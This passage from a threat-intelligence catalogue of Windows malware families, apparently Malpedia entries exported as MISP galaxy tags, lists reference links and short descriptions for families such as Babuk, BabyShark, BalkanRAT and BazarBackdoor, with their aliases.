https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf

https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/

https://ke-la.com/information-stealers-a-new-landscape/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/

https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/

https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/

https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf

https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/

https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers

https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside

https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan

https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/

https://community.riskiq.com/article/2a36a7d2/description

http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html

https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://unit42.paloaltonetworks.com/cybersquatting/

https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/

https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html

https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/

https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan

https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east

https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat

https://fr3d.hk/blog/gazorp-thieving-from-thieves

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update

https://isc.sans.edu/diary/25120

https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d

https://community.riskiq.com/article/56e28880

https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/

https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/

https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/

https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/

Azov Wiper

According to Checkpoint, this malware is a wiper instead of ransomware as self-announced. It is manually written in FASM, unrecoverably overwriting data in blocks of 666 bytes, using multi-threading.

The tag is: misp-galaxy:malpedia="Azov Wiper"

Azov Wiper is also known as:

Table 2950. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.azov_wiper

https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper

https://research.checkpoint.com/2022/pulling-the-curtains-on-azov-ransomware-not-a-skidsware-but-polymorphic-wiper/

https://twitter.com/CPResearch/status/1587837524604465153

Babadeda

According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers’ analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.

The tag is: misp-galaxy:malpedia="Babadeda"

Babadeda is also known as:

Table 2951. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities

Babuk (Windows)

Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.

The tag is: misp-galaxy:malpedia="Babuk (Windows)"

Babuk (Windows) is also known as:

  • Babyk

  • Vasa Locker

Table 2953. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

https://resources.prodaft.com/wazawaka-report

https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://www.bleepingcomputer.com/news/security/leaked-babuk-locker-ransomware-builder-used-in-new-attacks/

https://securelist.com/ransomware-world-in-2021/102169/

https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf

https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html

https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html

https://cocomelonc.github.io/book/2023/12/13/malwild-book.html

https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751

https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/

https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/

https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/

https://raw.githubusercontent.com/vc0RExor/Malware-Threat-Reports/main/Ransomware/Babuk/Babuk_Ransomware_EN_2021_05.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings

https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1

http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-moving-to-vm-nix-systems.pdf

https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/IOCs-blog-Ransomware%20Actor%20Abuses%20Genshin%20Impact%20Anti-Cheat%20Driver%20to%20Kill%20Antivirus.txt

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/

https://blog.morphisec.com/babuk-ransomware-variant-major-attack

https://www.bleepingcomputer.com/news/security/babuk-ransomware-is-back-uses-new-version-on-corporate-networks/

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf

https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2

https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f

https://github.com/EmissarySpider/ransomware-descendants

https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/

https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62

https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/

https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/

https://www.fr.sogeti.com/globalassets/france/avis-dexperts—​livres-blancs/cybersecchronicles-_babuk.pdf

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/is-there-really-such-a-thing-as-a-low-paid-ransomware-operator/

https://mssplab.github.io/threat-hunting/2023/06/15/malware-analysis-babuk.html

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://twitter.com/GossiTheDog/status/1409117153182224386

https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html

https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/

https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/

https://krebsonsecurity.com/2022/02/wazawaka-goes-waka-waka/

https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/

https://twitter.com/Sebdraven/status/1346377590525845504

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/

https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/

https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/

BabyLon RAT

The tag is: misp-galaxy:malpedia="BabyLon RAT"

BabyLon RAT is also known as:

Table 2954. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat

https://twitter.com/KorbenD_Intel/status/1110654679980085262

BabyShark

BabyShark is Microsoft Visual Basic (VB) script-based malware family first seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, thus it can be delivered via different file types including PE files as well as malicious documents. It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator

The tag is: misp-galaxy:malpedia="BabyShark"

BabyShark is also known as:

  • LATEOP

Table 2956. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries

https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf

https://www.youtube.com/watch?v=rfzmHjZX70s

https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/

https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html

https://twitter.com/i/web/status/1099147896950185985

https://blog.alyac.co.kr/3352

https://www.youtube.com/watch?v=Dv2_DK3tRgI

https://us-cert.cisa.gov/ncas/alerts/aa20-301a

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf

https://blog.google/threat-analysis-group/how-were-protecting-users-from-government-backed-attacks-from-north-korea/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1

https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html

https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html

https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood

Bachosens

The tag is: misp-galaxy:malpedia="Bachosens"

Bachosens is also known as:

Table 2957. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bachosens

https://medium.com/threat-intel/cybercrime-investigation-insights-bachosens-e1d6312f6b3a

BACKBEND

FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.

The tag is: misp-galaxy:malpedia="BACKBEND"

BACKBEND is also known as:

Table 2958. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

BackNet

The tag is: misp-galaxy:malpedia="BackNet"

BackNet is also known as:

Table 2960. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.backnet

https://github.com/valsov/BackNet

Backoff POS

The tag is: misp-galaxy:malpedia="Backoff POS"

Backoff POS is also known as:

Table 2961. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.backoff

https://securelist.com/sinkholing-the-backoff-pos-trojan/66305/

BadEncript

The tag is: misp-galaxy:malpedia="BadEncript"

BadEncript is also known as:

Table 2965. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript

https://twitter.com/PhysicalDrive0/status/833067081981710336

badflick

BADFLICK, a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration.

The tag is: misp-galaxy:malpedia="badflick"

badflick is also known as:

Table 2966. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick

https://blog.amossys.fr/badflick-is-not-so-bad.html

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

BadNews

The tag is: misp-galaxy:malpedia="BadNews"

BadNews is also known as:

Table 2968. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews

http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1

https://lab52.io/blog/new-patchwork-campaign-against-pakistan/

https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/

https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/

https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign

https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/

https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html

https://securelist.com/apt-trends-report-q1-2021/101967/

https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2

https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

Bagle

The tag is: misp-galaxy:malpedia="Bagle"

Bagle is also known as:

Table 2969. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle

https://archive.f-secure.com/weblog/archives/carrera_erdelyi_VB2004.pdf

BalkanDoor

According to ESET, BalkanDoor is a simple backdoor with a small number of commands (download and execute a file, create a remote shell, take a screenshot). It can be used to automate tasks on the compromised computer or to automatically control several affected computers at once. We have seen six versions of the backdoor, with a range of supported commands, evolve since 2016.

The tag is: misp-galaxy:malpedia="BalkanDoor"

BalkanDoor is also known as:

Table 2972. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_door

https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/

BalkanRAT

The goal of BalkanRAT which is a more complex part of the malicious Balkan-toolset (cf. BalkanDoor) is to deploy and leverage legitimate commercial software for remote administration. The malware has several additional components to help load, install and conceal the existence of the remote desktop software. A single long-term campaign involving BalkanRAT has been active at least from January 2016 and targeted accouting departments of organizations in Croatia, Serbia, Montenegro, and Bosnia and Herzegovina (considered that the contents of the emails, included links and decoy PDFs all were involving taxes). It was legitimaly signed and installed by an exploit of the WinRAR ACE vulnerability (CVE-2018-20250).

The tag is: misp-galaxy:malpedia="BalkanRAT"

BalkanRAT is also known as:

Table 2973. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_rat

https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/

Banatrix

The tag is: misp-galaxy:malpedia="Banatrix"

Banatrix is also known as:

Table 2975. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix

https://www.cert.pl/en/news/single/banatrix-an-indepth-look/

bangat

The tag is: misp-galaxy:malpedia="bangat"

bangat is also known as:

Table 2979. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat

https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal

BanPolMex RAT

BanPolMex is a remote access trojan that uses TCP for communication.

It uses an RC4-like stream cipher called Spritz for encryption of its configuration and network traffic.

It sends detailed information about the victim’s environment, like computer name, Windows version, free space of memory and all drives, processor identifier and architecture, system locale, system metrics, manufacturer, and network configuration.

It supports almost 30 commands that include operations on the victim’s filesystem, basic process management, file exfiltration, and the download and execution of additional tools from the attacker’s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. However, in this case the indicis are convertible into a meaningful ASCII representation, that even suggests the functionality: SLEP, HIBN, DRIV, DIR, DIRP, CHDR, RUN, RUNX, DEL, WIPE, MOVE, FTIM, NEWF, DOWN, ZDWN, UPLD, PVEW, PKIL, CMDL, DIE, GCFG, SCFG, TCON, PEEX, PEIN.

It has aclui.dll as the internal DLL name. It contains statically linked code from open-source libraries like libcurl (version 7.47.1) or zLib (version 0.15).

BanPolMex RAT was delivered for victims of a watering hole campaign targeting employees of Polish and Mexican banks, that was discovered in February 2017. It is usually loaded by HOTWAX.

The tag is: misp-galaxy:malpedia="BanPolMex RAT"

BanPolMex RAT is also known as:

Table 2982. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.banpolmex

https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf

https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/

Barb(ie) Downloader

The tag is: misp-galaxy:malpedia="Barb(ie) Downloader"

Barb(ie) Downloader is also known as:

Table 2983. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.barbie

https://www.cybereason.com/blog/operation-bearded-barbie-apt-c-23-campaign-targeting-israeli-officials

barkiofork

The tag is: misp-galaxy:malpedia="barkiofork"

barkiofork is also known as:

Table 2985. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.barkiofork

https://www.symantec.com/connect/blogs/backdoorbarkiofork-targets-aerospace-and-defense-industry

BATLOADER

According to PCrisk, BATLOADER is part of the infection chain where it is used to perform the initial compromise. This malware is used to execute payloads like Ursnif. Our team has discovered BATLOADER after executing installers for legitimate software (such as Zoom, TeamViewer Visual Studio) bundled with this malware. We have found those installers on compromised websites.

The tag is: misp-galaxy:malpedia="BATLOADER"

BATLOADER is also known as:

Table 2989. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bat_loader

https://www.esentire.com/blog/batloader-continues-signed-msix-app-package-abuse

https://www.seqrite.com/blog/decoding-batloader-2-x-unmasking-the-threat-of-stealthy-malware-tactics/

https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif

https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html

https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery

https://www.trendmicro.com/en_us/research/23/h/batloader-campaigns-use-pyarmor-pro-for-evasion.html

https://www.trendmicro.com/en_us/research/23/a/batloader-malware-abuses-legitimate-tools-uses-obfuscated-javasc.html

https://intel471.com/blog/malvertising-surges-to-distribute-malware

https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle

https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489

https://medium.com/walmartglobaltech/revisiting-batloader-c2-structure-52f46ff9893a

https://www.mandiant.com/resources/seo-poisoning-batloader-atera

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader

BazarBackdoor

BazarBackdoor is a small backdoor, probably by a TrickBot "spin-off" like anchor. Its called team9 backdoor (and the corresponding loader: team9 restart loader).

For now, it exclusively uses Emercoin domains (.bazar), thus the naming. FireEye uses KEGTAP as name for BazarLoader and BEERBOT for BazarBackdoor.

The tag is: misp-galaxy:malpedia="BazarBackdoor"

BazarBackdoor is also known as:

  • BEERBOT

  • KEGTAP

  • Team9Backdoor

  • bazaloader

  • bazarloader

Table 2990. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

https://twitter.com/anthomsec/status/1321865315513520128

https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/

https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf

https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware

https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike

https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/

https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue

https://www.hhs.gov/sites/default/files/bazarloader.pdf

https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html

https://isc.sans.edu/diary/27308

https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/

https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/

https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/

https://www.youtube.com/watch?v=pIXl79IPkLI

https://elis531989.medium.com/highway-to-conti-analysis-of-bazarloader-26368765689d

https://unit42.paloaltonetworks.com/api-hammering-malware-families/

https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/

https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit_John_Hammond_Huntress_Analyzing_Ryuk.pdf

https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html

https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/

https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware

https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/

https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/

https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/

https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader

https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html

https://malwarebookreports.com/a-look-back-at-bazarloaders-dga/

https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.bleepingcomputer.com/news/security/corporate-website-contact-forms-used-to-spread-bazarbackdoor-malware/

https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors

https://www.0ffset.net/reverse-engineering/analysing-the-main-bazarloader/

https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/

https://pcsxcetrasupport3.wordpress.com/2021/11/16/excel-4-macro-code-obfuscation/

https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I

https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/

https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/

https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/

https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html

https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor

https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/

https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://malwarebookreports.com/bazarloader-back-from-holiday-break/

https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire

https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9

https://kienmanowar.wordpress.com/2022/02/24/quicknote-techniques-for-decrypting-bazarloader-strings/

https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles

https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/

https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html

https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html

https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/

https://www.youtube.com/watch?v=uAkeXCYcl4Y

https://unit42.paloaltonetworks.com/bazarloader-anti-analysis-techniques/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/

https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://unit42.paloaltonetworks.com/ryuk-ransomware/

https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf

https://twitter.com/Unit42_Intel/status/1458113934024757256

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://forensicitguy.github.io/bazariso-analysis-advpack/

https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/

https://thedfirreport.com/2021/01/31/bazar-no-ryuk/

https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day

https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/

https://unit42.paloaltonetworks.com/bazarloader-malware/

https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/

https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv

https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/

https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/

https://intel471.com/blog/conti-leaks-ransomware-development

https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://abnormalsecurity.com/blog/bazarloader-contact-form

https://www.0ffset.net/reverse-engineering/bazarloader-iso-file-infection/

https://www.microsoft.com/en-us/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/

